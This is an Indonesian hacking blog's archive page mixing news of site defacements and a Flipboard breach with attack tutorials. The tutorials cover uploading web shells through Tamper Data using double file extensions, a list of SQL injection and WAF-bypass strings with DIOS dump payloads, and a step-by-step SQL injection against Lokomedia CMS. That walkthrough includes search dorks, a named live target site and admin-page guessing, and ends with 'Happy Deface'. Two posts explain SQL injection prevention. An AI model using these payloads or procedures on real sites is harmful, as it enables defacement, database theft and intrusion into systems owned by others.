Home » Archive for May 2019

Flipboard di Hack lebih dari 9 bulan.

Add Comment , , ,
Aplikasi agregasi berita, Flipboard, mengaku jika sistem mereka telah diretas. Para peretas berhasil mengakses informasi akun pengguna selama sembilan bulan.

Dilansir dari Digital Trends, Kamis, 30 Mei 2019, informasi yang bocor akibat peretasan ini termasuk nama pengguna, username Flipboard, password yang terenkripsi, dan alamat email.

Kejadian peretasan pun dua kali, 2 Juni 2018-23 Maret 2019 dan 21-22 April 2019. Meski begitu, tidak ada informasi tentang kartu kredit atau informasi perbankan lainnya yang bocor, mengingat aplikasi Flipboard memang tidak mengumpulkan data yang seperti itu.

Sebagai tindakan pencegahan, Flipboard mengaku telah mereset semua password pengguna. Artinya, para pengguna Flipboard harus membuat password baru ketika mereka mencoba untuk masuk ke akunnya.

"Reset tetap harus dilakukan meski password pengguna dilindungi enkripsi," demikian keterangan resmi Flipboard.

Mereka juga menyatakan bahwa sebagian besar kata sandi pengguna sudah dienkripsi dengan bcrypt, yang diklaim bisa menyulitkan peretas untuk membobol kata sandi.

Pengguna yang belum masuk ke akun mereka sejak 14 Maret 2012, akan memiliki kata sandi dengan fungsi kriptografi SHA-1, yang akan lebih mudah untuk di-crack.

Setelah mengetahui ada peretasan, maka Flipboard langsung memberitahu penegak hukum serta menghubungi perusahaan keamanan eksternal. Para penyelidik telah menngonfirmasi adanya kejadian peretasan.

Mereka mengatakan bahwa aksi ini membuat para peretas bisa mengakses serta berpotensi memiliki salinan dari basis data tertentu menyangkut informasi pengguna Flipboard.

Dengan begitu, Flipboard menjadi korban berikutnya dari aksi para peretas. Sebelumnya, nama-nama perusahaan teknologi besar harus berurusan dengan peretasan seperti Facebook, 500px, dan Quora.

Related Posts:

TAMPER DATA VIA ANDROID

Add Comment , ,

Assalamualaikum Wr.Wb
Kembali lagi Bersama Saya WICKED AKA SYAKI.XPLOIT TerGans :v
Tutorial kali ini adalah:
[Cara Tamper Data Via Android]

CARA 1
Bahan-bahan:
  •SandroProxy(KALO BACA YANG TELITI YANG KAMPRET,Nanya Nama APK nya,Terus Minta APK nya apa...Di Nomor Satu Lu klik aja '<')
  •Browser/Gugel
  •Kuota Internet (kalo gak punya kuota lu lihat Tutorial ini pake apaaan?)
  •Target Yang Mau di Tampar eh Tamper,Sorry :'V

Tutorial:

1.Buka Dolo APK Sandro Proxy atau bisa download KLIK Disini Ya GOBLOK  (KALO GAK BISA LU DOWNLOAD DI PS,BANG PS ITU APA?PLAY STORE GOBLOK)


2.Buka Target Kalian la
3.Cari Tempat Uploadnya(Ganti Nama Shell nya jadi shell.php.jpeg)
4.tinggal Cari Hasil up kita,Klik Lama...
Dan hasilnya akan seperti ini....

5.rename nama shell nya dah jadi namashell.php

6.Klik Save!
7.Masuk ke web Target Tadi
Dan Bommm....
Lihat Hasilnya


NB: Mungkin kalian pusing Ya harus klik apa di apk sandro proxy nya....Nih aink kasih tau(LIHAT SCREENSHOT DI BAWAH INI)

*NAH KALIAN KLIK(*DEVELOPER MODE, CAPTURE DATA) dan Klik DONE!!!! (DIBAGIAN KANAN BAWAH,KALO GAK KELIHATAN BERARTI MATA KALIAN PICEK)

*TERUS KALIAN IKUTI LANGKAH-LANGKAH(LANGKAH² APAAN?YANG NO 1-6 ITU,KALO MASIH GAK PAHAM BEGO KAU)

CARA 2

BAHAN:
1.TARGET
2.KUOTA INTERNET
3.SHELL(USAHAKAN MINI SHELL,DAN EXT .phtml)

*BANG aink Gak Punya Shell nya
Nih aink kasih klik link nya ya pea
Mirror 1 atau Mirror 2 atau Mirror 3 (Kontak Kami jika link error ❤)

*Bang Kok EXT nya .txt? LU GANTI NAMANYA AJA
CARANYA?
LU MASUK KE FILE MANAGER TERUS KLIK SHELLNYA>>KLIK LAINYA>>KLIK GANTI NAMA>>GANTILAH PEA JADI JEMBUT.PHTML

*GAK PAHAM?NIH AINK KASIH SCREENSHOT NYA
1.

2.
 3.


*TERUS LU UPLOAD LAH SHELL NYA INSYAALLAH TERUPLOAD,KLO GAK BISA ganti jadi .PHP.phtml masih gak bisa ganti jadi php.txt.jpg.png.xxxx.html dan klo masih gak bisa LU MENDING ADD BERITA ATAU APALAH TERUS JSO >> DONE!!!!!!!!


Masih gak paham juga? cek video dibawah :

●SETTPORT




 ●TAMPER
     


Hubungi AINK
Whatsapp : Wicked~

Keep Learn, Like, And Share~

Thanks for reading 😝
Wassalamualaikum Wr.Wb

Related Posts:

Situs BAWASLU Kabupaten Klaten di Jahili Hacker

Add Comment , , , ,
Berita-Internetku - "Situs BAWASLU Kabupaten Klaten di Jahili Hacker".

Kali ini hacker yang memiliki codename ./MrTahuSumedang beraksi dan meretas Subdomain Situs BAWASLU Kabupaten Klaten yang memiliki domain utama klaten.bawaslu.go.id.


Saat kalian membuka halaman rumah Situs BAWASLU Kabupaten Klaten memang seperti tidak terjadi apa-apa, karena pelaku hanya menitipkan file bernama afis.html, jadi kalian akan melihat halaman diretas saat membuka http://klaten.bawaslu.go.id/afis.html.

Untuk pesan yang ditinggalkan pelaku sudah sangat jelas untuk mengkritik kondisi Indonesia saat ini, berikut ini pesannya:

Ntah ada apa di negara ku saat ini :(
Yang kalah bukan paslon 01 atau 02 tapi yang kalah adalah Sila Ke 3 "PERSATUAN INDONESIA"

Pesan sarkasme yang cukup menyindir kondisi Indonesia yang sedang berantakan saat ini.
Pelaku juga meninggalkan beberapa codename yang sepertinya adalah teman-teman pelaku, seperti:

[ Greets : Desktop77N3T ~ Cyberpunks ~ ![F]Sn1per-X ~ xRyukZ ~ ZIPERS404 ~ 4LM05TH3V!L ~ WhiteSystem.'/404 ~ ./C3W3Kb3rb4T4n9 ]

[ #indonesiarules ]


Untuk mirrornya sendiri kalian bisa melihat di,

Semoga saja kasus peretasan ini tidak mengganggu kinerja dari website tersebut.
Sekian untuk berita hari ini, terimakasih sudah berkunjung.

Related Posts:

KUMPULAN STRING SQL-INJECTION TERBARU

Add Comment

Hallo sobat Garuda Tersakti 72, Assalamualaikum warah matullahi wabarakatuh, jumpa lagi sama gue, LoveTeeN72 Hehehee :D
Kali ini gue mau share macam-macam String Sekaligus beberapa Bypass Waff dengan methode SQL-Injection manual, bukan yang menggunakan tools hackbar/sqlmap atau sejenisnya yaa :D


Yuu, cek kebawaaah :D


Note :
Semua String Bypass dibawah ini, Saya ambil dari berbagai sumber dan dirangkum menjadi satu (Youtube, Group SQL-I, Forum, DLL)

[+] THIS IS STRING FOR EXECUTION WEBSITE VULN SQL-INJECTION [+]
'--+
'+--+
')--
')--+
')+--+
'))--+



[+] SEARCHING IN INJECT POINT [+]
order+by
group+by
order/**/by
order/**_**/by
/*!42247order*//**//*!42247by*/
%0aorder%0aby%0a



[+] UNION SELECT FOR NUMBER AT DATABASE [+]
union+select
union/**/select
union/**_**/select
.
id=1.unioN/**/distinct%20%73eleCt""a
id=1%.0unioN/**/distinct%20%73eleCt+-!~
id=1%""unioN/**/distinct%20%73eleCt@$%
id=1%''unioN/**/distinct%20%73eleCt@%C0%

cth :
id=1.unioN/**/distinct %73eleCt""a1,2,3``from.%20users``limit 0,1-- -
id=1%.0unioN/**/distinct %73eleCt+-!~a1,2,3|''from%20.users-- -
id=1%""unioN/**/distinct %73eleCt@$%a1,2,3|""from users-- -
id=1%''unioN/**/distinct %73eleCt@%C0%a1,2,3^""from users-- -



[+] AND FALSE OR AND TRUE [+]
and+0
div+0
and+false
having+0
having+1=0
and+1=0
limit 0
" and '1'='1
" and (1)=(1
where 1 /*!=*/ 2
/*!or*/1='1



[+] DUMB WITH DIOS [+]
concat_ws(0x3c62723e,0x415a5a41545353494e53,schema(),version(),user(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x))

concat_ws/**/(0x3c62723e,0x415a5a41545353494e53,database/**/(),version/**/(),user/**/(),(select%20concat/**/(@AZZATSSINS:=0x00,if((select%20count(*)%20/*!42247from*/%20/*!42247information_schema*/.columns%20/*!42247where*/%20/*!42247table_schema*/%20not%20like%200x696e666f726d6174696f6e5f736368656d61%20and%20@AZZATSSINS:=concat/**/(@AZZATSSINS,0x3c62723e,/*!42247table_name*/,0x3a,/*!42247column_name*/)),0x00,0x00),@AZZATSSINS)))

make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@)



[+] BYPASS WITH CONVERT [+]
*convert(concat(schema()+using+ascii)
ujis
ucs2
tis620
swe7
sjis

Hahaha, dikit ya? Engga ko sebenernya banyak Paman :)
Mau? Klik Dibawah yaa :D

CLICK HERE!

Thanks For Injector~
Special Thanks To AZZATSSINS~

Dan cek juga Artikel kami tentang Bypass Waff :D
Dan Jangan Lupa Support Kami dengan Like,Subscribe, And Share Agar Kami terus Semangat Post Artikel selanjutnyaa , hehehee .

Related Posts:

Cara Menutup Bug SQL Injection

Add Comment , ,

Assalamualaikum Wr.Wb
Kembali lagi bersama saya InD00R.4RT terGansπŸ˜‚
Kali Ini saya akan Membahas Tentang Bagaimana CARA MENUTUP BUG SQL INJECTION.
Ada beberapa tools yang yang biasanya digunakan untuk melakukan SQL Injection, misalnya :
  1. SQL Map
SQL Map adalah tools opensource yang mendeteksi dan melakukan exploit pada bug SQL injection secara otomatis. dengan melakukan serangan SQL injection seorang attacker dapat mengambil alih serta memanipulasi sebuah database di dalam sebuah server.
  1. Havij
Havij adalah alat untuk melakukan SQL Injection yang menguji penetrasi untuk menemukan dan mengeksploitasi kerentanan SQL Injection pada suatu halaman web.

Contoh script yang vuln terhadap SQLi:

<?php include "admin/config.php"; $id_anu = $_GET['id_anu']; $result = mysql_query("SELECT * FROM anu where id_anu ='$id_anu' ");
while($row = mysql_fetch_array($result)){ ?>

Di source code diatas terlihat tidak adanya filter untuk karakter seperti ('), (-), (--) sehingga bisa disisipi dengan perintah SQLi. Lalu, bagaimana cara menutup bug tersebut? Kali ini saya akan menggunakan easy method untuk menutup bug tersebut.


  1. Memberi filter pada karakter yang akan dimasukkan ke dalam query. Kita halau karakter seperti (-) terlebih dahulu.
if($id_anu < 0) {
   echo "Patched.";
   exit;
}
Definisi logika: Jika nilai $id kurang dari 0, maka akan tampil "Patched." | Mencegah karakter (-).
  1. Memberi perintah is_numeric. 
    if(!is_numeric($id_anu)) {
       echo "Patched.";
       exit;
    }
    Definisi logika: Jika nilai $id bukan golongan dari numeric atau angka, maka akan tampil "Patched."
  2. Memberi fungsi mysql_real_escape_string.
    mysql_real_escape_string adalah fungsi PHP yang digunakan untuk memberi backslash di beberapa kode untuk ditampilkan pada halaman, namun saat menyimpan menuju sql, kode akan tetap normal tanpa ada backslash.
$id_anu = mysql_real_escape_string($_GET['$id_anu']);

Mungkin Sekian Pembahasan nya, Jangan untuk Subscribe, Like, and Share hehehee,
thanks for reading and viewer~

Related Posts:

Tutorial Sql Injection CMS Lokomedia

Add Comment , ,



Assalamualaikum Wr.Wb ^_^
Pada Kesempatan Kali Ini Saya Akan Membahas Cara Deface Sql Injection Dengan Metode CMS Lokomedia:v

 Ok Kita Langsung Ke Tutorial Nya aja ya hehe :v

Bahan:
-Muka Tamvan (Kaya Si Penulis)
-Rokok And Kopi (Sunah)
-Dork: (Wajib)
 inurl:/statis-1-profil.html
 inurl:/hal-tentang-kami.html
 inurl:/statis-3-strukturorganisasi.html
 inurl:hal-visi-misi.html
 inurl:hal-program--kegiatan.html
 inurl:hal-struktur-organisasi.html
 inurl:hal-kata-sambutan.html
 intext:copyright by inurl:statis-1 ext:html

 Kembangin Lagi ya Dork Nya Biar Dapet Yg Perawan Sesuai Otak Vokep Kalian :v

Ok Mode Serius Gan :v

Pilih Salah Satu Web Yg Ingin Kalian Begal :D
Disini Saya Memenggunakan Live Target Web:
http://jokowipresidenku.org/berita-jokowi-ingin-ibu-kota-di-luar-jawa-sri-mulyani-soal-menkeu-sby--jokowi.html

Tinggal kasih string nya ' ya contoh:
Kalo Vuln Akan Seperti Gambar Ini ^_^

Nah Vuln guys Itu Artinya Web Nya Bisa Kita Entot :v Kita Lanjut Ke Order by Contoh:

Kita Cari Eror Nya Di Angka Berapa, Disini Eror Nya di Angka 37 jadi Colum Nya Ada 36 ya :v

Nah Tinggal Kita Union Select Aja, Caranya? Contoh:
Kita Pakai -'and+0+union+select dan Boom

Dapet Deh Angka Togel Nya :v Sekarang Tinggal Kita Tempel Dios Nya Di Angka Togel Seperti Ini: /*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!12345table_name*/,/*!12345column_name*/)),@)

Tinggal tempel Di Angka Togel Contoh:


Dan Boom :v Alay Dikit Gpp kali eaa :v

Nah:v Tinggal Kita Dump User Pw nya:v 

Kalo Dah Dapet Tinggal Ke Halaman Login Eaa 
 -site.com/admin
 -site.com/adminweb
 -site.com /redaktur
 -site.com/administrator
 -site.com/admin.php

Atau Kalian Bisa Scan Aja Menggunakan Admin Finder ok ^_^

Ok Cukup Sampe Sini Tutorial Nya Semoga Bermanfaat Untuk Kalian:v 
Jangan Lupa Di Share ya :v 

Kalo Mau Pepes Saya nitip nick :v Mr.Ch4m0nk Dan Nama Team nya Juga Garuda Tersakti 72
Happy Deface ^_^ Enjoy :v





Related Posts:

Mengenal Apa itu Teknik SQL Injection dan Cara Mencegahnya

Add Comment , ,
Assalamualaikum Wr.Wb
Pada kesempatan ini Saya Akan Membahas Tentang Teknik SQL Injection Dan Cara Mencegahnya.

Sebelum ke pembahasan Saya Akan Memperkenalkan diri terlebih dahulu,Tidak Apa-apa kanπŸ˜‚
Nama Saya: Muhammad Syaki Zaidan
Nick: InD00R.4RT
ASAL?Jabar

Ok sekian Perkenalan nya,Saya New Member Di Gt72,gak nanya ya?Ok tidak apa-apa.

Langsung ke Pembahasan πŸ˜‰

Teknik Hacking SQL Injection Dan Cara Mencegahnya

Apa itu SQL Injection?

SQL Injection adalah teknik hacking yang ditujukan untuk menyerang database SQL server. Caranya yaitu dengan memanfaatkan celah yang ada dan penempatan kode SQL server, dengan memasukan kode berbahaya melalui input masuk halaman suatu situs.
Selain itu cara melakukan sql injection ini merupakan teknik umum yang biasa dipakai untuk menyerang sebuah situs Internet

Apa Saja Penyebeb Terjadinya SQL Injection?

Perlu kalian ketahui SQL Injection terjadi karena tidak adanya penanganan terhadap karakter-karakter tanda petik tunggal (‘) dan juga karakter double minus (–). Sehingga seorang hacker dengan mudahnya bisa menyisipkan perintah SQL kedalam suatu parameter maupun suatu Form. Karena sesungguhnya para hacker hanya bermodalkan algoritma yang matang yang nantinya akan menjadi kode berbahaya bagi situs yang menjadi sasaran.

Apa Saja Jenis Serangan SQL Injection? Dibawah ini berbagai macam serangan SQL Injection



1. Identifying injectable parameters
Dengan cara ini penyerang hanya ingin menyelidiki Aplikasi Web untuk menemukan dimana parameter dan bidang-input pengguna rentan terhadap SQLIA.

2. Performing database finger-printing
Penyerang ingin menemukan jenis dan versi database yang aplikasi Web menggunakan. Beberapa jenis database yang berbeda merespon secara berbeda terhadap query dan serangan, dan informasi ini dapat digunakan untuk “sidik jari” database. Mengetahui jenis dan versi database digunakan oleh aplikasi Web memungkinkan penyerang untuk kerajinan serangan database specific.
3. Determining database schema
Untuk benar mengekstrak data dari database, penyerang seringkali perlu mengetahui informasi skema database, seperti nama tabel, nama kolom, dan tipe data kolom.
4. Extracting data
Jenis-jenis serangan menggunakan teknik yang akan mengekstrak nilai data dari database. Tergantung pada jenis aplikasi Web, informasi ini bisa menjadi sensitif dan sangat diinginkan untuk penyerang. Serangan dengan maksud ini adalah Jenis yang paling umum dari SQLIA.
5.Adding or modifying data
Tujuan dari serangan ini adalah untuk menambah atau mengubah informasi dalam database.
6.Performing denial of service
Serangan ini dilakukan untuk menutup database dari aplikasi Web, sehingga menyangkal layanan kepada pengguna lain.
7. Evading detection
Kategori ini mengacu pada teknik serangan tertentu yang digunakan untuk menghindari audit dan deteksi oleh mekanisme perlindungan sistem.
8. Bypassing authentication
Tujuan dari serangan jenis ini adalah untuk memungkinkan penyerang untuk memotong database dan mekanisme otentikasi aplikasi.
9. Executing remote commands
Jenis-jenis serangan mencoba untuk menjalankan perintah sewenang-wenang pada database. Perintah ini Canbe disimpan prosedur atau fungsi yang tersedia bagi pengguna database.
10. Performing privilege escalation
Serangan ini memanfaatkan kesalahan implementasi atau kekurangan logis dalam database untuk meningkatkan hak-hak istimewa dari penyerang. Berbeda dengan melewati serangan otentikasi, serangan ini fokus pada pemanfaatan hak database pengguna.
Diatas tadi merupakan beberapa jenis serangan menggunakan SQL Injetion yang sering digunakan oleh para Hacker. Kemudian yang perlu kalian ketahui khususnya yang memiliki website sendiri untuk tetap berhati-hati dalam mengakses dan mengelola pintu masuk database. Kemudian segala masalah pasti ada solusi, dan lebihbaik kalian lebih berhati-hati dalam mengelola website kalian agar terhindar dari kejahatan hacking dengan metode/POC  SQL Injection.

Lalu,Bagaimana Cara Pencegahan SQL Injection?

1. Hal pertama yang bisa kalian lakukan adalah dengan membatasi panjang input box (jika memungkinkan), jadi untuk membatasinya kalian bisa menyisipkanya di kode program, agar nanti si pembobol pemula akan bingung sejenak melihat input box nya tidak bisa diinject dengan perintah yang panjang.

2. Pada langkah kedua lakukan Filtering pada input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal (Input Validation).

3. Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan.

4. Matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures jika memungkinkan.

5. Ubah “Startup and run SQL Server” menggunakan low privilege user di SQL Server Security tab.

6. Pasang WAF ( Web Application Firewall ) Pada Web Server kalian. WAF (Web Application Firewall) ini berperan sangat penting dalam melindungi Web Server anda, Karena WAF bertugas sebagai penjaga web anda dari berbagai serangan berbahaya (SQL Injection, XSS, Spam, CSRF, dll).

Itulah cara untuk menghindari agar tidak terjadi SQL Injection Pada Website kita.
Setelah kita paham, Yu kita coba EXPLOITASI dari celah SQL-Injection ini Disini πŸ˜

Sekian pembahasannya,jika ada kata yang salah mohon di maafkan,saya kan Noob ParahπŸ˜‚
Thanks for Reading And Viewer
Waaikumssalam Wr.Wb

Related Posts:

Subdomain Kemdikbud Disambangi Hacker Kodename UseYourBrain

Add Comment ,

  Dikabarkan sore tadi salah satu forum gempar dengan adanya peretasan laman resmi kemdikbud yang beralamat kbhs.kemdikbud.go.id/.

  Pasalnya hacker dengan kodename UseYourBrain menyambangi dan mengubah halaman utama laman tersebut

   Masih belum diketahui maksud dan tujuan dari peretasan yang dilakukan, dugaan sementara hanya iseng dan sebatas unjuk skill .

  Terlihat bukan hanya satu, tetapi beberapa laman dari Universitas Indonesia pun juga disambangi.

  Diketahui bug yang dimanfaatkan oleh attacker bernama SQL Injection. Dengan ketidakrapian kode yang ada, attacker dapat leluasa mengambil data dan masuk.

  Sampai saat ini laman tersebut masih belum bisa diakses, hanya bertuliskan "Under Maintenance"


Related Posts:

25 Subdomain Kota Banjarmasin di Hack Mr.Bean

Add Comment , ,
Berita-Internetku - "25 Subdomain Kota Banjarmasin di Hack Mr.Bean".

Kali ini hacker yang memiliki codename Mr.B34N beraksi dan meretas 25 Subdomain Kota Banjarmasin yang memiliki domain utama banjarmasinkota.go.id.


Pelaku tidak meninggalkan pesan khusus, hanya pesan singkat seperti dibawah ini,
Defaced By ./XB34N'Z
# Lock Null Xploit #
I Love You ErlizaLh

dan juga meninggalkan beberapa codename yang sepertinya ada teman-teman pelaku, seperti
Official Member
「 — 3xploit — Pku.LNX# — UnKnwonz — InYourG00D — XpL3Z — DriXploit — ./c0dex.3rr — Vijune15 — XploitGhost| — Mr.Kz — Hum4n_X — F412 — XB34N'Z - 」

shoot :
「 WellSquad -IndoXploit - Explosion Squad Cyber - Anonymous Black Shadow - Silent Clown - Indonesian To World Team - Surabaya Carder Team 」



Untuk daftar ke-25 subdomain yang diretas kalian bisa melihat dibawah ini,

Untuk mirrornya sendiri kalian bisa melihat di,

Semoga saja kasus peretasan ini tidak mengganggu kinerja dari website tersebut.
Sekian untuk berita hari ini, terimakasih sudah berkunjung.

Related Posts:

Subscribe to: Posts (Atom)